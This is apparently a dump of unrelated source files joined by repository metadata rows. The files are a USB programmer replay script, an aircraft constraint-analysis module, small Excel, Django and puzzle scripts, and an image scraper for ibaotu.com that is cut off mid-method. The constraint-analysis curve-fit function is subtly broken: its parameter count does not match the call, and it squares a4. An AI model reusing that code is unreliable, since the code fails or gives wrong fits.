    buff = bulk2(dev, "\x02", target=0x06)
    validate_read("\x91\x00\xC0\x63\x09\x00", buff, "packet W: 387/388, R: 389/390")
    # Generated from packet 391/392
    # Optional blank check: "\x00\x00" means erased, "\x01\x00" means not blank
    if blank:
        print 'Blank checking'
        tstart = time.time()
        buff = bulk2(dev, "\x08\x00\x57\x90\x00", target=0x02)
        tend = time.time()
        print 'Blank test took %0.3f sec' % (tend - tstart,)
        if buff == "\x00\x00":
            print 'Blank: pass'
        elif buff == "\x01\x00":
            raise NotBlank('Blank: fail')
        else:
            hexdump(buff)
            raise Exception("Unknown blank status")
    # Generated from packet 395/396
    cmd_57s(dev, '\x8C', "\x00\x00")
    # Generated from packet 399/400
    cmd_50(dev, "\x18\x00")
    # Generated from packet 401/402
    buff = bulk2(dev,
        "\x66\xB8\x01\x32\x66\x89\x05\x06\x00\x09\x00\x66\xB9\x00\x00\xB2" \
        "\x00\xFB\xFF\x25\x44\x11\x00\x00"
        , target=0x02)
    validate_read("\x91\x00", buff, "packet W: 401/402, R: 403/404")
    # Generated from packet 405/406
    buff = bulk2(dev, "\x02", target=0x06)
    validate_read("\x92\x00\xE0\x63\x09\x00", buff, "packet W: 405/406, R: 407/408")
    # Generated from packet 409/410
    buff = bulk2(dev, "\x57\x91\x00\x57\x89\x00", target=0x02)
    validate_read("\x00\x00", buff, "packet W: 409/410, R: 411/412")
    # Generated from packet 413/414
    cmd_50(dev, "\x9F\x09")
    # Generated from packet 415/416
    buff = bulk2(dev, write_fw.p415, target=0x02)
    validate_read("\x92\x00", buff, "packet W: 415/416, R: 417/418")
    # Generated from packet 419/420
    buff = bulk2(dev, "\x02", target=0x06)
    validate_read("\x93\x00\x80\x6D\x09\x00", buff, "packet W: 419/420, R: 421/422")
    # Generated from packet 423/424
    buff = bulk2(dev, "\x57\x92\x00", target=0x01)
    validate_read("\x62", buff, "packet W: 423/424, R: 425/426")
    # Generated from packet 427/428
    # NOTE: prefix 0x18
    buff = bulk86(dev, target=0x01, prefix=0x18)
    validate_read("\x0B", buff, "packet 427/428")
    # Generated from packet 429/430
    # First firmware pass (program cycle; see fw_w for the chunk protocol)
    fw_w(dev, fw, verbose=True)

    # Generated from packet 513/514
    cmd_57s(dev, '\x8C', "\x00\x00")
    # Generated from packet 517/518
    cmd_50(dev, "\x18\x00")
    # Generated from packet 519/520
    buff = bulk2(dev,
        "\x66\xB8\x01\x2D\x66\x89\x05\x06\x00\x09\x00\x66\xB9\x00\x00\xB2" \
        "\x00\xFB\xFF\x25\x44\x11\x00\x00"
        , target=0x02)
    validate_read("\x93\x00", buff, "packet W: 519/520, R: 521/522")
    # Generated from packet 523/524
    buff = bulk2(dev, "\x02", target=0x06)
    validate_read("\x94\x00\xA0\x6D\x09\x00", buff, "packet W: 523/524, R: 525/526")
    # Generated from packet 527/528
    buff = bulk2(dev, "\x57\x93\x00\x57\x89\x00", target=0x02)
    validate_read("\x00\x00", buff, "packet W: 527/528, R: 529/530")
    # Generated from packet 531/532
    cmd_50(dev, "\xE0\x08")
    # Generated from packet 533/534
    buff = bulk2(dev, write_fw.p533, target=0x02)
    validate_read("\x94\x00", buff, "packet W: 533/534, R: 535/536")
    # Generated from packet 537/538
    buff = bulk2(dev, "\x02", target=0x06)
    validate_read("\x95\x00\x80\x76\x09\x00", buff, "packet W: 537/538, R: 539/540")
    # Generated from packet 541/542
    cmd_57_94(dev)
    # Generated from packet 547/548
    # Second firmware pass
    fw_w(dev, fw)

    # Generated from packet 631/632
    cmd_57s(dev, '\x8C', "\x00\x00")
    # Generated from packet 635/636
    cmd_50(dev, "\x18\x00")
    # Generated from packet 637/638
    buff = bulk2(dev,
        "\x66\xB8\x01\x37\x66\x89\x05\x06\x00\x09\x00\x66\xB9\x00\x00\xB2" \
        "\x00\xFB\xFF\x25\x44\x11\x00\x00"
        , target=0x02)
    validate_read("\x95\x00", buff, "packet W: 637/638, R: 639/640")
    # Generated from packet 641/642
    buff = bulk2(dev, "\x02", target=0x06)
    validate_read("\x96\x00\xA0\x76\x09\x00", buff, "packet W: 641/642, R: 643/644")
    # Generated from packet 645/646
    buff = bulk2(dev, "\x57\x95\x00\x57\x89\x00", target=0x02)
    validate_read("\x00\x00", buff, "packet W: 645/646, R: 647/648")
    # Generated from packet 649/650
    cmd_57_94(dev)
    # Generated from packet 655/656
    # Third firmware pass
    fw_w(dev, fw)

    # Generated from packet 739/740
    cmd_57s(dev, '\x8C', "\x00\x00")
    # Generated from packet 743/744
    cmd_50(dev, "\x0D\x00")
    # Generated from packet 745/746
    buff = bulk2(dev, "\x66\xB9\x00\x00\xB2\x00\xFB\xFF\x25\x44\x11\x00\x00", target=0x02)
    validate_read("\x96\x00", buff, "packet W: 745/746, R: 747/748")
    # Generated from packet 749/750
    buff = bulk2(dev, "\x02", target=0x06)
    validate_read("\x97\x00\xB0\x76\x09\x00", buff, "packet W: 749/750, R: 751/752")
    # Generated from packet 753/754
    cmd_57_50(dev, "\x96", "\x1A\x00")
    # Generated from packet 755/756
    buff = bulk2(dev,
        "\x66\xB9\x00\x00\xB2\x02\xFB\xFF\x25\x44\x11\x00\x00\x66\xB9\x00" \
        "\x00\xB2\x02\xFB\xFF\x25\x44\x11\x00\x00"
        , target=0x02)
    validate_read("\x97\x00", buff, "packet W: 755/756, R: 757/758")
    # Generated from packet 759/760
    buff = bulk2(dev, "\x02", target=0x06)
    validate_read("\x98\x00\xD0\x76\x09\x00", buff, "packet W: 759/760, R: 761/762")
    # Generated from packet 763/764
    buff = bulk2(dev, "\x57\x97\x00", target=0x02)
    validate_read("\x00\x00", buff, "packet W: 763/764, R: 765/766")
    # Generated from packet 767/768
    led_mask_30(dev, "pass")
    # Generated from packet 771/772
    gpio_readi(dev)
    # Generated from packet 775/776
    gpio_readi(dev)
    # Generated from packet 779/780
    sm_info22(dev)
    # Generated from packet 783/784
    sm_info24(dev)
    # Generated from packet 787/788
    sm_read(dev)
    # Generated from packet 791/792
    cmd_49(dev)
    # Generated from packet 795/796
    sm_read(dev)
    # Generated from packet 799/800
    sm_insert(dev)
    # Generated from packet 803/804
    sm_info10(dev)
"JohnDMcMaster@gmail.com"
] | JohnDMcMaster@gmail.com |
5530fc1dd282494eed47782c730c869b208595fc | 7a3998efd67cad635559ff8075fde895bf6011b0 | /learning_log/ll_env/lib/python3.6/_collections_abc.py | 56d21c1189ad68a96ad71da06ee12c1cb6a357ec | [] | no_license | zhangaobo/django | 3a983f7165788b3337e809f7d9d8827d8634d367 | 4a7e2ebaaec5ea6471e834d505c6871179f8176c | refs/heads/master | 2020-03-24T23:09:24.918430 | 2018-08-01T07:48:30 | 2018-08-01T07:48:30 | 143,120,618 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 59 | py | /home/zhangaobo/anaconda3/lib/python3.6/_collections_abc.py | [
"865765044@qq.com"
] | 865765044@qq.com |
dcd1312cab4fb26d9d18de7f6ae7ba98ab807bcc | 00c6ded41b84008489a126a36657a8dc773626a5 | /.history/Sizing_Method/ConstrainsAnalysis/ConstrainsAnalysisPD_20210712184959.py | 2722f9846c7b00deb679ab94edd3570b6ebdba30 | [] | no_license | 12libao/DEA | 85f5f4274edf72c7f030a356bae9c499e3afc2ed | 1c6f8109bbc18c4451a50eacad9b4dedd29682bd | refs/heads/master | 2023-06-17T02:10:40.184423 | 2021-07-16T19:05:18 | 2021-07-16T19:05:18 | 346,111,158 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,129 | py | # author: Bao Li #
# Georgia Institute of Technology #
import sys
import os
sys.path.insert(0, os.getcwd())
import numpy as np
import matplotlib.pylab as plt
import Sizing_Method.Other.US_Standard_Atmosphere_1976 as atm
import Sizing_Method.Aerodynamics.ThrustLapse as thrust_lapse
import Sizing_Method.Aerodynamics.Aerodynamics as ad
import Sizing_Method.ConstrainsAnalysis.ConstrainsAnalysis as ca
from scipy.optimize import curve_fit
"""
The unit use is IS standard
"""
class ConstrainsAnalysis_Mattingly_Method_with_DP:
"""This is a power-based master constraints analysis"""
def __init__(self, altitude, velocity, beta, wing_load, Hp=0.2, number_of_motor=12, C_DR=0):
"""
:param beta: weight fraction
:param Hp: P_motor/P_total
:param n: number of motor
:param K1: drag polar coefficient for 2nd order term
:param K2: drag polar coefficient for 1st order term
:param C_D0: the drag coefficient at zero lift
:param C_DR: additional drag caused, for example, by external stores,
braking parachutes or flaps, or temporary external hardware
:return:
power load: P_WTO
"""
self.h = altitude
self.v = velocity
self.rho = atm.atmosphere(geometric_altitude=self.h).density()
self.beta = beta
self.hp = Hp
self.n = number_of_motor
# power lapse ratio
self.alpha = thrust_lapse.thrust_lapse_calculation(altitude=self.h,
velocity=self.v).high_bypass_ratio_turbofan()
self.k1 = ad.aerodynamics_without_pd(self.h, self.v).K1()
self.k2 = ad.aerodynamics_without_pd(self.h, self.v).K2()
self.cd0 = ad.aerodynamics_without_pd(self.h, self.v).CD_0()
self.cdr = C_DR
self.w_s = wing_load
self.g0 = 9.80665
self.coefficient = (1 - self.hp) * self.beta * self.v / self.alpha
# Estimation of ΔCL and ΔCD
pd = ad.aerodynamics_with_pd(self.h, self.v, Hp=self.hp, n=self.n, W_S=self.w_s)
self.q = 0.5 * self.rho * self.v ** 2
self.cl = self.beta * self.w_s / self.q
# print(self.cl)
self.delta_cl = pd.delta_lift_coefficient(self.cl)
self.delta_cd0 = pd.delta_CD_0()
def master_equation(self, n, dh_dt, dV_dt):
cl = self.cl * n + self.delta_cl
cd = self.k1 * cl ** 2 + self.k2 * cl + self.cd0 + self.cdr + self.delta_cd0
p_w = self.coefficient * (self.q / (self.beta * self.w_s) * cd + dh_dt / self.v + dV_dt / self.g0)
return p_w
def cruise(self):
p_w = ConstrainsAnalysis_Mattingly_Method_with_DP.master_equation(self, n=1, dh_dt=0, dV_dt=0)
return p_w
def climb(self, roc):
p_w = ConstrainsAnalysis_Mattingly_Method_with_DP.master_equation(self, n=1, dh_dt=roc, dV_dt=0)
return p_w
def level_turn(self, turn_rate=3, v=100):
"""
assume 2 min for 360 degree turn, which is 3 degree/seconds
assume turn at 300 knots, which is about 150 m/s
"""
load_factor = (1 + ((turn_rate * np.pi / 180) * v / self.g0) ** 2) ** 0.5
p_w = ConstrainsAnalysis_Mattingly_Method_with_DP.master_equation(self, n=load_factor, dh_dt=0, dV_dt=0)
return p_w
def take_off(self):
"""
A320neo take-off speed is about 150 knots, which is about 75 m/s
required runway length is about 2000 m
K_TO is a constant greater than one set to 1.2 (generally specified by appropriate flying regulations)
"""
Cl_max_to = 2.3 # 2.3
K_TO = 1.2 # V_TO / V_stall
s_G = 1266
p_w = 2 / 3 * self.coefficient / self.v * self.beta * K_TO ** 2 / (
s_G * self.rho * self.g0 * Cl_max_to) * self.w_s ** (
3 / 2)
return p_w
def stall_speed(self, V_stall_to=65, Cl_max_to=2.3):
V_stall_ld = 62
Cl_max_ld = 2.87
W_S_1 = 1 / 2 * self.rho * V_stall_to ** 2 * (Cl_max_to + self.delta_cl)
W_S_2 = 1 / 2 * self.rho * V_stall_ld ** 2 * (Cl_max_ld + self.delta_cl)
W_S = min(W_S_1, W_S_2)
return W_S
def service_ceiling(self, roc=0.5):
p_w = ConstrainsAnalysis_Mattingly_Method_with_DP.master_equation(self, n=1, dh_dt=roc, dV_dt=0)
return p_w
allFuncs = [take_off, stall_speed, cruise, service_ceiling, level_turn, climb]
class ConstrainsAnalysis_Gudmundsson_Method_with_DP:
"""This is a power-based master constraints analysis based on Gudmundsson_method"""
def __init__(self, altitude, velocity, beta, wing_load, Hp=0.2, number_of_motor=12, e=0.75, AR=10.3):
"""
:param tau: power fraction of i_th power path
:param beta: weight fraction
:param e: wing planform efficiency factor is between 0.75 and 0.85, no more than 1
:param AR: wing aspect ratio, normally between 7 and 10
:return:
power load: P_WTO
"""
self.h = altitude
self.v = velocity
self.beta = beta
self.w_s = wing_load
self.g0 = 9.80665
self.beta = beta
self.hp = Hp
self.n = number_of_motor
self.rho = atm.atmosphere(geometric_altitude=self.h).density()
# power lapse ratio
self.alpha = thrust_lapse.thrust_lapse_calculation(altitude=self.h,
velocity=self.v).high_bypass_ratio_turbofan()
h = 2.43 # height of winglets
b = 35.8
ar_corr = AR * (1 + 1.9 * h / b) # equation 9-88, If the wing has winglets the aspect ratio should be corrected
self.k = 1 / (np.pi * ar_corr * e)
self.coefficient = (1-self.hp) * self.beta * self.v / self.alpha
# Estimation of ΔCL and ΔCD
pd = ad.aerodynamics_with_pd(self.h, self.v, Hp=self.hp, n=self.n, W_S=self.w_s)
self.q = 0.5 * self.rho * self.v ** 2
cl = self.beta * self.w_s / self.q
self.delta_cl = pd.delta_lift_coefficient(cl)
self.delta_cd0 = pd.delta_CD_0()
# TABLE 3-1 Typical Aerodynamic Characteristics of Selected Classes of Aircraft
cd_min = 0.02
cd_to = 0.03
cl_to = 0.8
self.v_to = 68
self.s_g = 1480
self.mu = 0.04
self.cd_min = cd_min + self.delta_cd0
self.cl = cl + self.delta_cl
self.cd_to = cd_to + self.delta_cd0
self.cl_to = cl_to + self.delta_cl
def cruise(self):
p_w = self.q / self.w_s * (self.cd_min + self.k * self.cl ** 2)
return p_w * self.coefficient
def climb(self, roc):
p_w = roc / self.v + self.q * self.cd_min / self.w_s + self.k * self.cl
return p_w * self.coefficient
def level_turn(self, turn_rate=3, v=100):
"""
assume 2 min for 360 degree turn, which is 3 degree/seconds
assume turn at 100 m/s
"""
load_factor = (1 + ((turn_rate * np.pi / 180) * v / self.g0) ** 2) ** 0.5
q = 0.5 * self.rho * v ** 2
p_w = q / self.w_s * (self.cd_min + self.k * (load_factor / q * self.w_s + self.delta_cl) ** 2)
return p_w * self.coefficient
def take_off(self):
q = self.q / 2
p_w = self.v_to ** 2 / (2 * self.g0 * self.s_g) + q * self.cd_to / self.w_s + self.mu * (
1 - q * self.cl_to / self.w_s)
return p_w * self.coefficient
def service_ceiling(self, roc=0.5):
vy = (2 / self.rho * self.w_s * (self.k / (3 * self.cd_min)) ** 0.5) ** 0.5
q = 0.5 * self.rho * vy ** 2
p_w = roc / vy + q / self.w_s * (self.cd_min + self.k * (self.w_s / q + self.delta_cl) ** 2)
# p_w = roc / (2 / self.rho * self.w_s * (self.k / (3 * self.cd_min)) ** 0.5) ** 0.5 + 4 * (
# self.k * self.cd_min / 3) ** 0.5
return p_w * self.coefficient
def stall_speed(self, V_stall_to=65, Cl_max_to=2.3):
V_stall_ld = 62
Cl_max_ld = 2.87
W_S_1 = 1 / 2 * self.rho * V_stall_to ** 2 * (Cl_max_to + self.delta_cl)
W_S_2 = 1 / 2 * self.rho * V_stall_ld ** 2 * (Cl_max_ld + self.delta_cl)
W_S = min(W_S_1, W_S_2)
return W_S
allFuncs = [take_off, stall_speed, cruise, service_ceiling, level_turn, climb]
if __name__ == "__main__":
n = 100
w_s = np.linspace(100, 9000, n)
constrains_name = ['take off', 'stall speed', 'cruise', 'service ceiling', 'level turn @3000m',
'climb @S-L', 'climb @3000m', 'climb @7000m']
constrains = np.array([[0, 68, 0.988], [0, 80, 1], [11300, 230, 0.948],
[11900, 230, 0.78], [3000, 100, 0.984], [0, 100, 0.984],
[3000, 200, 0.975], [7000, 230, 0.96]])
color = ['c', 'k', 'b', 'g', 'y', 'plum', 'violet', 'm']
label = ['feasible region with PD', 'feasible region with PD', 'feasible region Gudmundsson',
'feasible region without PD', 'feasible region without PD', 'feasible region Mattingly']
m = constrains.shape[0]
p_w = np.zeros([2 * m, n])
for k in range(3):
plt.figure(figsize=(12, 8))
for i in range(m):
for j in range(n):
h = constrains[i, 0]
v = constrains[i, 1]
beta = constrains[i, 2]
if k == 0:
problem1 = ConstrainsAnalysis_Gudmundsson_Method_with_DP(h, v, beta, w_s[j])
problem2 = ca.ConstrainsAnalysis_Gudmundsson_Method(h, v, beta, w_s[j])
plt.title(r'Constraint Analysis: $\bf{Gudmundsson-Method}$ - Normalized to Sea Level')
elif k == 1:
problem1 = ConstrainsAnalysis_Mattingly_Method_with_DP(h, v, beta, w_s[j])
problem2 = ca.ConstrainsAnalysis_Mattingly_Method(h, v, beta, w_s[j])
plt.title(r'Constraint Analysis: $\bf{Mattingly-Method}$ - Normalized to Sea Level')
else:
problem1 = ConstrainsAnalysis_Gudmundsson_Method_with_DP(h, v, beta, w_s[j])
problem2 = ConstrainsAnalysis_Mattingly_Method_with_DP(h, v, beta, w_s[j])
plt.title(r'Constraint Analysis: $\bf{with}$ $\bf{DP}$ - Normalized to Sea Level')
if i >= 5:
p_w[i, j] = problem1.allFuncs[-1](problem1, roc=15 - 5 * (i - 5))
p_w[i + m, j] = problem2.allFuncs[-1](problem2, roc=15 - 5 * (i - 5))
else:
p_w[i, j] = problem1.allFuncs[i](problem1)
p_w[i + m, j] = problem2.allFuncs[i](problem2)
if i == 1:
l1a, = plt.plot(p_w[i, :], np.linspace(0, 250, n), color=color[i], label=constrains_name[i])
l1b, = plt.plot(p_w[i + m, :], np.linspace(0, 250, n), color=color[i], linestyle='--')
if k != 2:
l1 = plt.legend([l1a, l1b], ['with DP', 'without DP'], loc="upper right")
else:
l1 = plt.legend([l1a, l1b], ['Gudmundsson method', 'Mattingly method'], loc="upper right")
else:
plt.plot(w_s, p_w[i, :], color=color[i], label=constrains_name[i])
plt.plot(w_s, p_w[i + m, :], color=color[i], linestyle='--')
def func(x, a0, a1, a2, a3, a4, a5, a6):
return a0 + a1*x + a2*x**2 + a3*x**3 + a4* a4*np.sin(x) + a5*np.cos(x)
#return a * np.exp(b * x) + c
if i == 1:
xdata, ydata = p_w[i, :], np.linspace(0, 250, n)
popt, _ = curve_fit(func, xdata, ydata)
p_w[i, :] = func(w_s, popt[0], popt[1], popt[2], popt[3], popt[4], popt[5])
if k != 2:
p_w[1 + m, :] = 10 ** 10 * (w_s - p_w[1 + m, 2])
else:
def func(x, a, b, c, d, e):
return a + b*x + c*x**2 + d*x**3 + e*x**4
#return a * np.exp(b * x) + c
xdata, ydata = p_w[m+1, :], np.linspace(0, 250, n)
popt, _ = curve_fit(func, xdata, ydata)
p_w[m+1, :] = func(w_s, popt[0], popt[1],
popt[2], popt[3], popt[4])
plt.fill_between(w_s, np.amax(p_w[0:m, :], axis=0), 200, color='b', alpha=0.25,
label=label[k])
plt.fill_between(w_s, np.amax(p_w[m:2 * m, :], axis=0), 200, color='r', alpha=0.25,
label=label[k + 3])
plt.xlabel('Wing Load: $W_{TO}$/S (N/${m^2}$)')
plt.ylabel('Power-to-Load: $P_{SL}$/$W_{TO}$ (W/N)')
plt.legend(bbox_to_anchor=(1.002, 1), loc="upper left")
plt.gca().add_artist(l1)
plt.xlim(100, 9000)
plt.ylim(0, 200)
plt.tight_layout()
plt.grid()
plt.show()
| [
"libao@gatech.edu"
] | libao@gatech.edu |
1a832fc6b0bc12b74f738f2e713a5ee2c1ca2225 | 0abc56ccc965e5468fa3d10f61950be0011a2106 | /time_split/time_split.py | 6fdd3fe69061705c9f4dffcc23665f56894a6d1f | [] | no_license | jendit/helper_scripts | 995498ec03ce4b9f41fd05c3c6a765d1db71ae90 | 5e3e585f269710cbdb5da3ca5f89d0025722616a | refs/heads/master | 2020-12-23T04:40:22.748352 | 2020-10-31T21:58:29 | 2020-10-31T21:58:29 | 237,037,925 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,520 | py | import datetime
import os
import openpyxl
# Workbook file names; both spreadsheets are expected to live in the
# user's Documents folder (paths built below in an OS-independent way).
TIME_SPLIT_SHORTCUTS = 'time_split_shortcuts.xlsx'
TIME_SPLIT_RECORDS = 'time_split_records.xlsx'
SEP = os.path.sep
HOME = os.path.expanduser('~')
# Absolute paths used by read_shortcurts() and set_task().
TIME_SPLIT_SHORTCUTS_PATH = HOME + SEP + 'Documents' + SEP + TIME_SPLIT_SHORTCUTS
TIME_SPLIT_RECORDS_PATH = HOME + SEP + 'Documents' + SEP + TIME_SPLIT_RECORDS
def read_shortcurts():
    ''' Read shortcut list file into a dictionary.

    Rows are read from the second row of the active sheet (row 1 is the
    header) until the first row where either column is empty, matching the
    previous sentinel behaviour.

    return - A dictionary mapping shortcut -> task name.
    '''
    sc = {}
    wb = openpyxl.load_workbook(TIME_SPLIT_SHORTCUTS_PATH)
    # iter_rows replaces the manual while-True/row-counter loop: it is bounded
    # by the sheet's last used row, and the explicit break preserves the
    # original "stop at the first incomplete row" semantics.
    for shortcut_cell, task_cell in wb.active.iter_rows(min_row=2, max_col=2):
        if shortcut_cell.value is None or task_cell.value is None:
            break
        sc[shortcut_cell.value] = task_cell.value
    wb.close()
    return sc
def set_task(task_name = ''):
    ''' Close the last open task and optionally append a new one.

    The records sheet has one row per task: name, start time, end time.
    If the most recent row has no end time yet, it is stamped with "now".
    When *task_name* is given, a fresh row (name, now) is appended.

    task_name - optional name of the task to start.
    '''
    workbook = openpyxl.load_workbook(TIME_SPLIT_RECORDS_PATH)
    sheet = workbook.active
    # Column A is always filled, so its length gives the last used row.
    last_row = len(sheet['A'])
    end_cell = sheet.cell(row = last_row, column = 3)
    if end_cell.value is None:
        end_cell.value = datetime.datetime.now()
    if task_name:
        sheet.append([task_name, datetime.datetime.now()])
    workbook.save(TIME_SPLIT_RECORDS_PATH)
    workbook.close()
def input_time_split():
    '''Prompt the user for a task shortcut and record it.

    An empty input just closes the last open task; a known shortcut closes
    the last open task and starts the named one; an unknown shortcut is
    reported as an error and nothing is written.
    '''
    print('Please provide a shortcut for a task (see >> time_split_shortcuts.xlsx << for reference).')
    print('Or leave empty to just close the last active task.')
    shortcut = input('Task: ')
    if shortcut:
        try:
            set_task(read_shortcurts()[shortcut])
        except KeyError:
            print('ERROR, the given shortcut is unknown.')
    else:
        set_task()
if __name__ == '__main__':
    # Run the interactive prompt when executed as a script.
    input_time_split()
| [
"github@jendit.de"
] | github@jendit.de |
23293778fc992b1a7ac90ba81cfa91528abec5d1 | 5c549afbb43d729c885549bf8a840d126494d65a | /blog/views.py | b9cf714a360c30369d18b40fb4f04a3c7462c46a | [] | no_license | KateSuhina/my-second-blog | 9bd3521d92ab744f54ea256bd7d6799ea8ea2a0c | 31a96c11b40a5936e380164a4070fd873d04107a | refs/heads/master | 2020-05-02T17:27:08.741910 | 2019-04-13T22:24:36 | 2019-04-13T22:24:36 | 178,098,797 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 294 | py | from django.shortcuts import render
from django.utils import timezone
from .models import Post
def post_list(request):
    """Render all posts whose publish date is in the past, oldest first."""
    published_posts = Post.objects.filter(published_date__lte=timezone.now()).order_by('published_date')
    context = {'posts': published_posts}
    return render(request, 'blog/post_list.html', context)
| [
"kate-suhina@mail.ru"
] | kate-suhina@mail.ru |
503833400f7b454aa0abc77e674ac65f7dc016bd | 40413ee7823b065367ca6946ff2b0b0b1aab06cf | /Assignment_4/count_words.py | b887bae11a08125312b4160cb6c243f10f166824 | [] | no_license | DavinderSinghKharoud/Algorithm-Assignments | 12fda32197835aa1a23a122e4b1eeaeaaa6b52b0 | 026db39306bc7ae4c6414bc1a68b2f578af0dd2a | refs/heads/master | 2020-04-14T03:58:09.225764 | 2019-03-18T22:28:58 | 2019-03-18T22:28:58 | 163,621,889 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 549 | py | def count_words(text):
punctuations = '''!()-[]{};:'"\,<>./?@#$%^&*_~'''
noPunc = ""
for char in text:
if char not in punctuations:
noPunc += char
lowerCaseString = noPunc.lower()
dict = {}
lst = lowerCaseString.split()
for item in lst:
if item in dict:
counting = dict[item]
counting += 1
dict[item] = counting
else:
dict[item] = 1
return dict
print(count_words("wow it's Working good wow!! now now ha ha")) | [
"noreply@github.com"
] | DavinderSinghKharoud.noreply@github.com |
303f80432afead7c22d6ea79a6e4a822e3d9d90b | fd403a6f14d4663f05cdb061fbab54ce4056206c | /adventureofcode/2015/day_2_part_2.py | 47d430618636acf207740ed16d9e85f1b7516f58 | [] | no_license | maurobaraldi/coding_puzzles | 2a99d0c7bfe40a00785ce2f9bf10a6ba04f1a350 | c0f455ade9e4eb91f1b444957e4c0acc165e6cc6 | refs/heads/master | 2023-06-10T02:28:56.195126 | 2023-05-25T10:23:23 | 2023-05-25T10:23:23 | 275,801,362 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 304 | py | #!/usr/bin/env python3
from utils import get_input
def solution():
    """Total ribbon needed: per box, the smallest face perimeter plus a bow
    equal to the box volume (Advent of Code 2015, day 2, part 2)."""
    boxes = get_input(2).split()
    total = 0
    for box in boxes:
        # Sorting first makes the two smallest dimensions explicit; the
        # volume is order-independent, so the product is unchanged.
        small, mid, large = sorted(int(dim) for dim in box.split('x'))
        total += 2 * (small + mid) + small * mid * large
    return total
| [
"mauro.baraldi@gmail.com"
] | mauro.baraldi@gmail.com |
fa39ad4a20775edf1df08ae99000b85137c92925 | 84edfe0e79b57bdaa59aa7b0f9c81db5a5ccf4cc | /ibaotu/main.py | 2b7bd4986ef3354b004506079b3617319fe2dfa8 | [] | no_license | Zhangzitong161031/multithreading_crawlers | b5dca0102e63f2e770502484ee7a89a265d35759 | b8ec68b432b2536636e0d231d0bd482fedd71192 | refs/heads/master | 2020-05-24T15:32:51.471202 | 2019-05-20T05:42:53 | 2019-05-20T05:42:53 | 187,334,188 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,362 | py | # -*- coding:utf-8 -*-
import requests
import threading
from queue import Queue
import time
from proxy_helper import Proxy_helper
from bs4 import BeautifulSoup
import os
import pymysql
from mysqlConfig import MysqlConfig
from StatusCodeError import StatusCodeError
class Spider(threading.Thread):
    """Worker thread: drains list-page URLs from a shared queue, scrapes the
    image links from each ibaotu.com list page, downloads the images under
    C:/ibaotu/ and records failed URLs in MySQL.

    The proxy-related code is currently commented out throughout; requests go
    out directly. Schema creation is serialised across threads via the
    module-level mysqlInitializeLock / mysqlInitialized globals.
    """

    def __init__(self, threadName, url_queue, validip_que):
        # threadName: label used in log output; url_queue: list-page URLs to
        # crawl; validip_que: queue of validated proxy IPs (unused while the
        # proxy code is commented out).
        threading.Thread.__init__(self)
        self.daemon = True
        self.mysqlConfig = MysqlConfig
        self.url_queue = url_queue
        self.validip_que = validip_que
        self.threadName=threadName

    def run(self):
        """Connect to MySQL, initialise the schema once, then crawl URLs."""
        print("%s开始启动" % (self.name))
        self.connectMysql()
        # Only the first thread to take the lock creates the tables.
        global mysqlInitialized
        global mysqlInitializeLock
        mysqlInitializeLock.acquire()
        if not mysqlInitialized:
            self.initializeMysql()
            mysqlInitialized=True
        mysqlInitializeLock.release()
        self.makeDir("C:/ibaotu","下载根目录")
        # Drain the shared queue; empty() + get() is not atomic, but with the
        # queue pre-filled before the threads start this is benign here.
        while not self.url_queue.empty():
            url = self.url_queue.get()
            self.getListHtml(url)
            self.url_queue.task_done()

    def connectMysql(self):
        """Open this thread's pymysql connection using MysqlConfig."""
        try:
            self.mysqlClient = pymysql.connect(
                host=self.mysqlConfig.host,
                port=self.mysqlConfig.port,
                user=self.mysqlConfig.user,
                passwd=self.mysqlConfig.password,
                database=self.mysqlConfig.database,
                use_unicode=True
            )
            print("%s数据库连接成功"%(self.threadName))
        except Exception as e:
            print("%s数据库连接异常,错误信息为%s"%(self.threadName,str(e)))

    def initializeMysql(self):
        """Run every ';'-separated statement from initialize.sql (once)."""
        try:
            with open("initialize.sql",'r',encoding='utf-8') as fd:
                sqlStr=fd.read()
            sqlCommands = sqlStr.split(';')
            for command in sqlCommands:
                if command!="":
                    self.mysqlClient.cursor().execute(command)
                    # Assumes each statement is a CREATE TABLE whose name is
                    # the first backtick-quoted token.
                    print("{}成功创建数据表{}".format(self.threadName,command.split("`")[1]))
            print('%s数据库初始化成功!'%(self.threadName))
        except BaseException as e:
            print("%s数据库初始化异常,错误信息为%s"%(self.threadName,str(e)))

    def getListHtml(self,url,repeat_count=0):
        """Fetch one list page, scrape image URLs and download each image.

        Retries recursively up to 3 times on any failure; after that the URL
        is recorded in the failed-list table.
        """
        # validip = self.validip_que.get()
        # proxy = {'http': validip}
        try:
            response = requests.get(url,timeout=7)
            if response.status_code == 200:
                # Per-page download directory, named after the page number.
                page_no = url.split("/")[-1].replace(".html", "")
                page_dir = "C:/ibaotu/page" + page_no
                self.makeDir(page_dir,"列表页文件夹")
                # self.validip_que.put(validip)
                response.encoding = "utf-8"
                soup = BeautifulSoup(response.text, "lxml")
                img_list = soup.select(".pic-box dt img")
                for img in img_list:
                    # NOTE(review): start_time here is never used (timing is
                    # done inside downloadImage) -- candidate for removal.
                    start_time=time.time()
                    src = "https:" + img.get('data-url').split("-0.jpg")[0]
                    alt = img.get("alt")
                    # Strip characters that are invalid in Windows file names.
                    invalid_str_arr = ["/", ".", "\\", "\r\n", "。", "*", '"', "<", ">", "|", "?", "?", ":"]
                    for invalid_str in invalid_str_arr:
                        alt = alt.replace(invalid_str, "")
                    file_extension_name = src.split("!")[0].split("/")[-1].split(".")[-1]
                    file_name = alt + "." + file_extension_name
                    file_path = page_dir + "/" + file_name
                    self.downloadImage(src,file_path)
            else:
                raise StatusCodeError("状态码错误,状态码为{}".format(response.status_code))
        except BaseException as e:
            print("%s列表页%s下载异常,错误信息为%s" % (self.threadName, url, str(e)))
            repeat_count += 1
            if repeat_count < 4:
                print("%s列表页%s下载失败,正在进行第%d次重新下载!" % (self.threadName,url, repeat_count))
                self.getListHtml(url, repeat_count)
            else:
                print("%s列表页%s下载失败" % (self.threadName,url))
                self.sqlInsertFailedUrl(url,"list")

    def downloadImage(self,src,file_path,repeat_count=0):
        """Download one image to *file_path*, retrying up to 3 times.

        NOTE(review): this requests.get has no timeout (unlike getListHtml),
        and a failed URL is inserted on *every* retry as well as on final
        failure -- duplicates are only suppressed by INSERT IGNORE. Confirm
        whether the insert inside the except block should be removed.
        """
